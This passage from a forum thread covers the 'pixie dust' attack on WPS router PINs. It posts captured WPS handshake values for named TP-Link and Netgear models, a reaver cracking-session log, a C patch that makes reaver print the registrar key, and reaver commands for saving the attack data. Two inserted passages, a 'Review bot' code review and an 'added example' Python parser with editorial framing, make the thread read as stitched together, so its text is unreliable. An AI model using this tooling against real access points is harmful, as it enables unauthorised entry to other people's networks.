    PKR: 28:bc:09:26:90:73:5f:24:bb:23:9a:89:49:b5:aa:9e:30:cd:98:60:eb:5e:52:a8:08:82:e4:75:b7:3f:84:5b:87:a6:b0:f6:d2:9e:4d:9e:0e:c7:0e:99:b7:69:1e:d7:7b:11:4e:a8:d0:42:77:b8:48:43:36:b6:ec:2f:0f:4c:c3:03:98:c8:18:3b:07:1c:b4:7a:17:80:90:25:93:91:b5:16:4f:0a:83:95:36:92:95:63:a1:fb:50:41:18:b3:c8:4d:bc:a5:43:32:87:93:a4:27:1d:b7:aa:08:7d:1f:7b:f7:20:20:e8:a7:e9:af:29:9c:44:95:af:7d:aa:02:81:bb:29:71:34:67:07:57:c8:64:7a:01:f3:26:7f:98:a3:0a:27:aa:b8:b8:ab:40:39:60:3a:51:82:ac:de:60:e5:ad:2a:bf:e5:2c:9d:b4:2a:fb:ec:16:a2:b6:7f:03:bb:0e:bb:65:16:72:e8:86:3b:af:03:1d:57:87:ea:26
    AuthKey: 98:e5:4a:b4:53:ad:1b:9a:56:ff:df:5c:65:0d:1d:0d:1b:6c:b3:8f:ec:a8:7e:c2:d4:34:28:96:e4:ee:5a:85
    E-Hash1: 2a:5e:0d:41:71:48:2e:bf:42:c0:c7:5d:78:6e:d5:d5:0c:51:82:20:21:91:b2:2d:f0:74:e4:14:f5:fa:a9:fd
    E-Hash2: 63:c7:21:cb:d7:7c:1d:0c:50:55:22:de:0e:e4:7c:d4:4a:94:7c:b7:61:97:07:7f:ed:0c:7c:7f:99:ba:4e:d0

    Model: TL-WR841N - TP-Link

    E-Nonce: 9b:0f:a4:49:82:5b:5b:ff:ea:e6:ee:dc:15:75:f1:bc
    PKE: e5:dd:ed:96:42:29:30:4c:d5:fe:00:94:4a:6c:44:d5:f9:f3:72:f4:e1:cd:83:3d:4b:7c:00:e2:0b:33:95:a5:75:1b:8c:0e:f4:0a:36:a6:1c:2d:63:36:fd:47:9a:65:3f:4a:26:3c:13:ac:85:75:01:31:94:cc:29:a2:ac:0b:eb:1a:2c:5c:36:63:65:15:17:c2:36:6e:4a:71:65:be:ca:bd:d5:86:6b:db:f7:90:38:cd:a2:95:1f:af:12:eb:24:af:f1:62:7c:df:8f:2a:bb:94:98:5e:65:62:39:8a:19:75:fa:ac:dd:98:36:f0:77:44:fe:59:9d:65:3a:cd:ed:d1:b7:52:c0:ed:93:99:a1:8d:54:5b:55:c5:8a:c0:0f:1e:c9:5e:e9:cc:bd:b8:1e:88:e9:6d:06:a4:21:35:cc:a5:30:40:5d:4d:08:e3:aa:92:0a:fd:0a:84:0f:d5:11:07:2e:fe:05:e3:70:72:ea:fa:b9:93:60:85:8d:bf
    AuthKey: 6c:fa:cd:30:17:d5:ee:87:b4:c7:ff:c9:de:8e:20:7c:95:27:f6:62:f5:16:48:55:84:04:ef:85:33:40:54:43
    E-Hash1: 89:c6:62:2d:c8:c3:b7:24:ef:ca:c7:79:2a:83:0e:f5:ed:9c:1d:a4:fd:20:b2:e1:61:a7:81:c1:f9:30:40:01
    E-Hash2: cd:a0:79:3b:4e:12:f9:e2:c8:e7:14:34:51:3a:2d:75:eb:0f:c8:42:0b:de:4d:1d:1e:29:e1:4b:bd:d1:d7:72
    PKR: 28:bf:b7:94:77:e4:c2:9d:0e:f8:60:1e:d1:0f:22:24:50:b4:c9:06:26:86:62:ea:cb:6d:66:8e:92:ee:a2:8a:0f:66:c2:72:cc:25:43:32:ee:d5:b6:37:02:f7:9f:9c:7d:5b:93:5b:b9:49:7b:1e:fd:20:87:5a:d8:ea:55:55:52:e9:bc:56:0f:82:d2:61:fb:4f:e3:08:bd:10:52:36:8c:81:c9:e8:0b:97:c0:bd:10:30:72:cc:20:d2:31:6a:f2:8a:c0:7c:a6:c2:8c:ae:43:0a:eb:0b:e0:13:76:40:91:ec:aa:55:46:83:f3:b3:c2:d8:1a:e5:20:16:a4:6c:68:d9:b0:68:e2:ef:35:74:d4:25:f3:a9:71:1c:19:e7:82:d3:c7:96:e7:33:1d:97:20:5e:8c:58:71:ac:8f:33:3c:2a:d8:55:f6:74:51:1b:ff:e8:19:e0:8a:95:ad:53:03:40:a6:70:f7:22:b2:42:47:e3:1b:0d:28:64:a5:15

    Model: TL-WR1043ND - TP-Link

    E-Nonce: 75:28:e8:1e:7e:9f:35:42:53:96:21:31:72:56:0d:12
    PKE: 5f:48:b9:03:9b:ca:ce:5e:f2:50:05:5f:a8:ed:84:5a:91:39:ce:b8:3c:f9:c9:0b:14:67:2d:f5:8d:72:86:d7:41:d5:b2:4e:41:fd:9e:a2:8d:a5:5a:c2:70:78:e7:83:ab:98:49:c2:c1:0a:17:4f:e1:b3:58:ee:71:e1:b1:99:33:69:07:1b:3a:96:b7:dd:a6:8b:31:ce:0d:8a:a1:1a:63:ee:5b:d3:d9:d4:27:cb:95:e8:22:ac:89:f1:d3:ba:cc:f2:8c:0d:18:1b:e3:d9:77:df:bb:cf:dd:1e:13:81:26:b1:b3:4a:8c:85:06:40:17:29:04:04:d2:d2:5b:41:12:62:de:2d:ed:5c:94:81:c0:21:18:c1:f6:5e:5c:9e:71:e5:66:44:12:fb:da:38:56:de:ec:c7:58:36:93:ee:b5:b0:72:5c:68:c1:81:c1:8f:b0:c9:41:9f:d1:0a:72:92:56:d9:af:c5:d3:e4:78:b9:e7:91:66:d9:7e:8b:fb
    PKR: 5f:45:13:03:8f:b9:52:a0:d4:6b:bf:5e:c2:54:7a:9f:1d:d8:47:19:ca:0f:47:71:3a:c4:ce:18:6c:1e:91:0f:2e:c3:c1:60:1a:91:41:09:49:98:c1:d3:65:ab:15:21:39:1d:69:bd:1a:5a:7e:ad:fb:f7:a7:c2:bb:65:3d:62:2e:02:fb:ea:31:23:4e:18:e4:77:24:da:6c:92:d6:d2:f0:ef:7a:4e:6c:3e:df:c4:c5:57:a6:67:93:6b:38:15:7e:05:77:fa:f9:b4:35:06:5f:b5:6c:5a:0f:36:e0:6a:79:4b:e2:65:1b:03:cc:22:10:80:83:90:59:f4:ae:1f:41:f8:e4:ef:d3:01:f6:ad:17:b2:6d:04:51:57:53:3d:55:78:c4:69:50:3c:11:db:e1:d2:f2:0f:9b:23:9c:81:2f:27:c6:bd:b8:3f:8d:b5:e7:5f:4f:63:3a:85:72:24:43:48:63:1e:95:08:c1:44:66:9a:11:43:6a:03:45:a4
    AuthKey: 75:bf:65:6f:e9:51:a9:f9:6c:8a:ec:fa:1a:96:6b:52:19:4c:22:6c:e5:e3:5c:c8:72:b9:bc:78:45:ba:e4:f8
    E-Hash1: a0:34:b8:48:57:38:23:ea:8a:29:b7:c9:15:b3:8f:c8:52:87:2f:08:7e:c9:57:e8:52:04:b5:f6:18:2d:71:4c
    E-Hash2: b5:99:8a:6d:85:4b:63:e7:91:af:5b:be:4a:19:7e:eb:e7:9c:04:3d:7c:6a:c2:2d:56:66:4b:f1:6a:47:a4:17

    Model: TL-WR1043 - TP-Link

    E-Nonce: d4:1c:7d:7f:a7:9d:31:9f:a2:16:fb:4e:e2:6f:a2:80
    PKE: 5c:08:ff:c8:9f:3b:96:1d:9d:89:28:5a:9d:bf:8d:06:12:f6:a1:5f:01:7e:e0:34:e8:b0:d8:d8:c4:ff:be:00:c4:81:50:03:1b:a2:ac:b4:22:e2:49:71:fa:ff:01:2c:74:62:4e:15:ad:4c:40:7d:1a:6a:af:f9:63:4f:f0:6d:f1:1b:56:7f:47:15:94:8b:28:80:a2:dd:0a:28:a3:46:05:57:5f:16:cd:e7:25:b7:50:e6:f9:f4:00:e8:35:6d:c4:15:82:c2:2a:4d:8b:e2:63:2d:a1:cb:db:cd:c6:3e:8a:60:12:2e:a8:53:96:0c:ca:8c:82:5e:42:f9:aa:db:4f:f0:de:8a:37:5c:0d:b5:4f:7d:bb:47:a9:62:58:3d:db:31:e4:be:68:39:5a:92:f9:75:9b:e6:50:ae:27:df:87:83:62:42:f1:13:3a:d5:a7:66:8c:cb:3c:9f:12:1d:76:0b:6d:eb:a5:84:73:8a:60:33:19:ac:2a:74:2c:f8
    AuthKey: 2f:0c:46:3c:ad:a0:35:b5:83:ab:02:9e:b7:ec:91:47:e4:00:d9:ee:60:4d:40:49:76:92:eb:9f:1a:e3:84:cb
    E-Hash1: 3c:72:7a:a4:9e:42:30:e2:81:1a:04:ef:e7:40:fd:de:f3:b7:eb:0a:82:ad:0e:82:9d:b8:3f:a8:d0:d9:b5:06
    E-Hash2: a4:cb:f4:96:31:fc:1f:2a:7e:7a:b2:6b:b3:1b:aa:2a:0a:87:d2:54:60:07:1b:4b:0e:d7:7a:f2:c6:a4:fc:7e
    PKR: da:ab:2e:3f:67:b2:0c:e6:69:9f:13:68:e6:3a:78:c5:c8:d7:ab:60:0f:1c:57:5f:e4:bd:b0:76:0d:a7:20:3f:0a:b4:9f:2e:80:99:fa:06:fa:46:03:03:ea:7c:d4:fa:f8:a6:ca:cc:74:e9:18:f7:f2:54:d2:e9:10:71:2f:5a:b6:71:df:1f:dc:d2:67:c8:19:45:41:d9:f7:a1:fc:e8:95:0c:92:cd:59:4e:ae:5d:68:98:b3:8d:82:dc:ca:cc:ca:b8:79:35:fa:a4:e0:5d:85:13:31:a2:ea:99:8d:bd:82:2c:b4:7a:35:92:1a:84:c7:99:e8:0f:96:69:d0:14:5e:dc:31:09:3b:a3:da:65:56:54:ad:4a:d3:1a:9e:e4:98:17:98:d4:29:c0:8b:7c:75:30:b7:c8:fe:4a:65:5c:38:5b:1c:71:2e:35:a2:de:07:52:2e:6f:01:e0:1a:60:e6:b8:22:92:ca:62:cf:a7:4e:6a:46:62:43:48:f0:42

    Model: WNR2000v4 - Netgear
    Chip: Atheros AR9341

    E-Nonce: 99:a2:d2:0d:f9:9d:f8:35:da:4b:a7:6d:6a:01:85:23
    PKE: ac:e6:d0:a0:d3:17:7b:b0:d0:69:bc:37:23:d9:1a:2e:dc:cb:8d:e7:de:fe:22:89:04:1e:34:5d:1d:f9:5a:25:b4:15:0f:43:c3:b2:22:97:4c:b6:8f:ec:9d:31:91:0a:76:bc:20:98:d6:22:db:71:dc:82:6d:df:8c:19:12:6d:ad:0f:3a:88:54:83:68:97:ae:27:18:39:84:f5:46:15:4f:f7:38:20:60:80:56:42:76:48:d6:d3:b8:79:88:56:ca:4d:d5:29:1a:47:1c:78:0d:31:fb:aa:23:fb:03:ee:cf:be:77:bf:2e:7d:f2:06:2d:11:f9:47:20:97:08:79:c3:47:1c:13:58:cd:35:a1:76:a3:eb:71:14:c4:7e:39:7a:e5:15:95:b1:fa:40:7d:b0:e2:e4:8a:af:eb:de:67:5e:c6:05:0d:3d:13:9d:9c:49:c4:46:a1:92:60:d7:27:a4:e2:b1:6d:52:79:da:29:c7:45:93:13:0b:e4:28:b5
    AuthKey: b8:e6:b4:e6:73:e1:92:32:e1:87:11:d6:0c:10:0e:3f:05:d4:b8:6c:0d:53:b8:50:c5:3f:d2:95:1f:6a:ab:98
    E-Hash1: 6b:f2:06:6b:dd:ce:f7:4c:42:df:62:d8:60:3b:3b:2d:b9:da:8e:da:d6:f5:df:b4:a7:2f:a2:c6:bd:61:61:87
    E-Hash2: d7:e2:ce:c5:2f:0d:b4:8e:f3:a6:19:ee:38:d7:19:55:1a:ef:3a:7f:ab:93:e5:0c:df:fe:cf:bb:f1:ab:06:74

  42. #192
    Is this helpful?

    Code:
    diff --git a/src/crypto/dh_groups.c b/src/crypto/dh_groups.c
    --- a/src/crypto/dh_groups.c
    +++ b/src/crypto/dh_groups.c
    @@ -605,6 +605,17 @@ struct wpabuf * dh_init(const struct dh_
        wpabuf_put(pv, pv_len);
        wpa_hexdump_buf(MSG_DEBUG, "DH: public value", pv);
    
    +    printf("[P] PKR: ");
    +    int pixiecnt = 0;
    +   const u8 *pkr = wpabuf_head_u8(pv);
    +    for (; pixiecnt < 192; pixiecnt++) {
    +        printf("%02x", pkr[pixiecnt]);
    +        if (pixiecnt != 191) {
    +            printf(":");
    +        }
    +    }
    +    printf("\n");
    +
        return pv;
     }
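    Review bot: the bound in `for (; pixiecnt < 192; pixiecnt++)` is hard-coded, so the loop reads past the buffer if dh_init() is ever called for a group whose public value is shorter than 192 bytes; take the length from the buffer instead (`size_t len = wpabuf_len(pv);`, loop while `pixiecnt < len`, separator test `pixiecnt != len - 1`). 192 is only right for the 1536-bit group WPS uses, and nothing in the hunk restricts the code to that group. Two smaller points: `int pixiecnt = 0;` is declared after a statement, which relies on C99 mixed declarations, and the `const u8 *pkr` line is indented one space short of the others. Since `pv` here is the local public value, the `[P] PKR:` label is correct for reaver acting as registrar; note that the `wpa_hexdump_buf(MSG_DEBUG, "DH: public value", pv)` call just above already dumps the same bytes when debug output is enabled, so routing the new line through the same logging would keep one output path.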

  43. #193
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    @someone_else Thanks for all the data! I've added it

  44. #194
    Join Date
    2014-Oct
    Posts
    42
    Quote Originally Posted by t6_x View Post
    This is a example

    [+] Switching mon0 to channel 9
    [?] Restore previous session for 64:70:02:535:FA? [n/Y] n
    [+] Waiting for beacon from 64:70:02:535:FA
    [+] Associated with 64:70:02:535:FA (ESSID: t6)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: d7:5b:a5:c1:be:a9:23:da:......
    [P] PKE: d5:2e:5f:2e:58:ee:d0:3e:f2:d0:18:bc:a2:c9:be:da:91 :6e:b5:81:0f:5a:ee:30:0f:7b:00:ea:bf:86:73:86:b8:f f:24:f7:........
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 1.0
    [+] Received M1 message
    [P] PKR: 01:38:b1:f2:38:52:5f:cc:8a:e5:0e:00:30:5f:15:b2:e3:88:86:68:1c:c1:b4:6d:a9:80:45:dd:c8:cd:07:8a:a1:18:45:.......
    [+] Sending M2 message
    [P] E-Hash1: ee:a0:46:ba:b1:e3:80:29:cd:80:0b:b2:e2:..........
    [P] E-Hash2: 59:43:8b:93:7a:79:b1:d9:ef:7a:d6:b0:50:.....
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    Hi t6_x, would it be possible for you to post this version of reaver?

  45. #195
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    I'll upload the new reaver tomorrow when I get a chance

  46. #196
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by Espresso_Boy View Post
    Is this helpful?

    Code:
    diff --git a/src/crypto/dh_groups.c b/src/crypto/dh_groups.c
    --- a/src/crypto/dh_groups.c
    +++ b/src/crypto/dh_groups.c
    @@ -605,6 +605,17 @@ struct wpabuf * dh_init(const struct dh_
        wpabuf_put(pv, pv_len);
        wpa_hexdump_buf(MSG_DEBUG, "DH: public value", pv);
    
    +    printf("[P] PKR: ");
    +    int pixiecnt = 0;
    +   const u8 *pkr = wpabuf_head_u8(pv);
    +    for (; pixiecnt < 192; pixiecnt++) {
    +        printf("%02x", pkr[pixiecnt]);
    +        if (pixiecnt != 191) {
    +            printf(":");
    +        }
    +    }
    +    printf("\n");
    +
        return pv;
     }
    Yeah that's what we've been looking for! Thanks!

  47. #197
    Join Date
    2014-Oct
    Posts
    42
    Quote Originally Posted by soxrok2212 View Post
    I'll upload the new reaver tomorrow when I get a chance
    Thank you very much soxrok2212.

  48. #198
    Join Date
    2015-Mar
    Posts
    127
    New reaver and pixiewps, good times

  49. #199
    Join Date
    2013-Jul
    Posts
    841
    For the modded reaver for pixiedust

    You can separate out the pixiedust data and write directly to a file as follows:

    If you include the -o <filename> command in the reaver command line:

    reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -o pixietest01

    reaver will write all data not preceded by [P] to the file pixietest01

    reaver will write data preceded by [P] to the screen, not to the file


    The data preceded by [P], though, is the data required for a pixiedust attack.

    Therefore:

    To write only pixiedust data to a file use the following:

    reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -o pixietest01 | tee pixiedust02

    In this case:

    Non-pixiedust data will be written to pixiedust01

    Pixiedust data only will be written to both screen and the file pixiedust02


    Musket Teams
    Last edited by mmusket33; 2015-04-12 at 10:57.
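    The "[P]" lines shown in the quoted run above (post #194) and split off with tee in the post just above are the only ones that carry the protocol values. As an added example, written here and not code from reaver, pixiewps or Musket Teams, the Python script below does that split in code, rejoins hex values that a terminal or a forum wrapped across lines, and checks every cryptographic field against the length the WPS protocol defines for it (16-byte nonces, 192-byte DH public keys from the 1536-bit group, 32-byte HMAC-SHA-256 hashes and AuthKey), so a dump truncated with "......" like the one in the quoted example is rejected before anything tries to use it. The sample output embedded in the script is constructed, not a real capture.

```python
"""Parse and sanity-check the "[P]" lines printed by the pixiedust-modded reaver.

Added example, not reaver's, pixiewps' or Musket Teams' own code.
"""
import re

# Byte lengths as the WPS protocol defines them: 128-bit nonces, 1536-bit DH
# public keys (192 bytes), and 256-bit HMAC-SHA-256 outputs for the hashes
# and the AuthKey.
EXPECTED_LEN = {
    "E-Nonce": 16,
    "PKE": 192,
    "PKR": 192,
    "AuthKey": 32,
    "E-Hash1": 32,
    "E-Hash2": 32,
}

P_LINE = re.compile(r"^\[P\]\s+([^:]+):\s*(.*)$")
HEX_PAIR = re.compile(r"^[0-9a-fA-F]{2}$")


def extract_p_fields(output):
    """Return {field: value} for the "[P]" lines of reaver's output, in order.

    Every other line ("[+]", "[!]", ...) is dropped, which is the same split
    the tee command in the post above does by hand.  Whitespace inside a hex
    value (left behind by line wrapping) is removed.
    """
    fields = {}
    for line in output.splitlines():
        m = P_LINE.match(line.strip())
        if not m:
            continue
        name, value = m.group(1).strip(), m.group(2).strip()
        if name in EXPECTED_LEN:
            value = re.sub(r"\s+", "", value)
        fields[name] = value
    return fields


def parse_hex(value):
    """Turn 'aa:bb:cc' into bytes; raise ValueError on a malformed or truncated dump."""
    parts = value.strip(":").split(":")
    if not all(HEX_PAIR.match(p) for p in parts):
        raise ValueError("not a colon-separated hex dump: %r" % value)
    return bytes(int(p, 16) for p in parts)


def check_fields(fields):
    """Return {field: problem} for each protocol value that is missing, not a
    clean hex dump (e.g. cut short with '....'), or of the wrong length.
    An empty result means every expected value is present and well-formed."""
    problems = {}
    for name, want in EXPECTED_LEN.items():
        if name not in fields:
            problems[name] = "missing"
            continue
        try:
            got = len(parse_hex(fields[name]))
        except ValueError:
            problems[name] = "malformed"
            continue
        if got != want:
            problems[name] = "length %d, expected %d" % (got, want)
    return problems


def hexdump(data):
    """Format bytes the way reaver prints them: lowercase hex pairs joined by ':'."""
    return ":".join("%02x" % b for b in data)


# Constructed sample values and output in the shape of the modded reaver's
# log; none of this is a real capture.
SAMPLE_ENONCE = bytes(range(0x10, 0x20))
SAMPLE_PKE = bytes((i * 7 + 3) & 0xFF for i in range(192))
SAMPLE_PKR = bytes((i * 11 + 5) & 0xFF for i in range(192))
SAMPLE_HASH1 = bytes(range(32))
SAMPLE_HASH2 = bytes(range(32, 64))
SAMPLE_AUTHKEY = bytes(range(64, 96))

SAMPLE_OUTPUT = "\n".join([
    "[+] Waiting for beacon from 00:11:22:33:44:55",
    "[+] Sending EAPOL START request",
    "[P] E-Nonce: " + hexdump(SAMPLE_ENONCE),
    # a value wrapped by the terminal, leaving a stray space inside it
    "[P] PKE: " + hexdump(SAMPLE_PKE[:17]) + " :" + hexdump(SAMPLE_PKE[17:]),
    "[P] WPS Manufacturer: EXAMPLE-VENDOR",
    "[P] WPS Model Number: 1.0",
    "[+] Received M1 message",
    "[P] PKR: " + hexdump(SAMPLE_PKR),
    "[P] AuthKey: " + hexdump(SAMPLE_AUTHKEY),
    "[+] Sending M2 message",
    "[P] E-Hash1: " + hexdump(SAMPLE_HASH1),
    "[P] E-Hash2: " + hexdump(SAMPLE_HASH2),
    "[+] Received M3 message",
])

if __name__ == "__main__":
    found = extract_p_fields(SAMPLE_OUTPUT)
    for name, value in found.items():
        print("%-16s %s" % (name, value if len(value) < 60 else value[:57] + "..."))
    print("problems:", check_fields(found) or "none")
```

    Feed it the file written by tee (or reaver's whole output; the non-"[P]" lines are ignored) and look at check_fields() before going further: a "malformed" E-Hash means the dump was cut short, and a wrong PKE or PKR length means the output was not the full 1536-bit DH public value.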

  50. #200
    Join Date
    2013-Jul
    Posts
    841
    To soxrok2212

    MTeams modded the /src/crypto/dh_groups.c file as suggested by Espresso above.

    We reinstalled reaver and ran tests.

    The --pkr variable is provided through reaver along with --pke etc.

    The mod is inserted below line 606

    Line 606 = wpa_hexdump_buf(MSG_DEBUG, "DH: public value", pv);


    Code:
        wpabuf_put(pv, pv_len);
        wpa_hexdump_buf(MSG_DEBUG, "DH: public value", pv);

        /******** ADD THIS PART ******/

        /* Print the registrar's DH public value (PKR) on stdout as a
         * colon-separated hex string, in the same "[P]" format as the
         * other values, so it can be collected with them.  192 bytes is
         * the size of the 1536-bit DH group that WPS uses, i.e. pv_len
         * here. */
        printf("[P] PKR: ");
        int pixiecnt = 0;
        const u8 *pkr = wpabuf_head_u8(pv);
        for (; pixiecnt < 192; pixiecnt++) {
            printf("%02x", pkr[pixiecnt]);
            if (pixiecnt != 191) {
                printf(":");
            }
        }
        printf("\n");

        /*** END ADD THIS PART END ***/

        return pv;
    }



    We will send you an automated script soon. We are currently using it, but the addition of a --pkr variable provided by reaver has caused us to have to add this choice into the menu so there will be a delay.

    MTeams
